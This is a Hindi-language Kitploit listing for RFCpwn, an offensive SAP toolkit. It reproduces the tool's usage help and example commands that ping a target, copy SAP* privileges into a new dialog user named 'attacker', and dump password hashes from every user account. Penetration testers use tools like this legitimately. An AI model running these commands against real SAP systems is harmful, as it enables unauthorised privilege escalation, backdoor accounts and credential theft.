Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RFCpwn — SAP को RFC कॉल का उपयोग करके गणना और शोषण टूलकिट | Kitploit
उपकरण/GitHubGitHub/icryo/rfcpwn
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubicryo/rfcpwn

RFCpwn

SAP को RFC कॉल का उपयोग करके गणना और शोषण टूलकिट

रिपॉजिटरी देखें
40116 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RFCpwn

SAP RFC कॉल्स का उपयोग करके SAP एनुमरेशन और एक्सप्लॉइटेशन टूलकिट

ट्विटर: @icryo

यह एक टूलकिट है जो समझौता किए गए सेवा खातों के प्रभाव को प्रदर्शित करने के लिए है।

यह PoC उत्पादन वातावरण में उपयोग के लिए नहीं है, स्थिरता या समर्थन की कोई गारंटी नहीं है।

RFCpwn pyrfc और SAP द्वारा प्रदान की गई लाइब्रेरीज़ पर निर्भर करता है: https://github.com/SAP/PyRFC#installation

root@kitploit:~
usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
                   [-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
                   [-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]

An Impacket style enumeration and exploitation tool using SAP RFC calls

optional arguments:
  -h, --help   show this help message and exit
  -debug       Turn DEBUG output ON

Authentication:
  -ip IP       <targetName or address>
  -u Username  RFC Users Username
  -p Password  RFC Users Password
  -c Client    Client- eg.000
  -s Sysid     System Number- eg 00
  -ping        RFC Ping Command

User Abuse:
  -enum        Use to enumerate a specific user
  -usercopy    add a Dialog User
  -user USER   Required for -usercopy and -userenum to specify the user
  -copy COPY   User to be copied required for -usercopy
  -pw PW       password of new user for -usercopy

Hash Collection:
  -dump        Dump hashes use with below
  -exp         EXPERIMENTAL - Dump BCODE / PASSCODE hashes

उदाहरण

पिंग - कनेक्टिविटी की पुष्टि करें

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping

एक उपयोगकर्ता के अधिकारों को एक नए डायलॉग उपयोगकर्ता में कॉपी करें। यदि -copy निर्दिष्ट नहीं है तो SAP* का उपयोग किया जाता है।

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1

सभी उपयोगकर्ताओं से हैश डंप करें। विकल्प -exp प्रयोगात्मक bcode और passcode हैश के लिए।

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump 

डेमो

Imgur Image

टूल डाउनलोड करें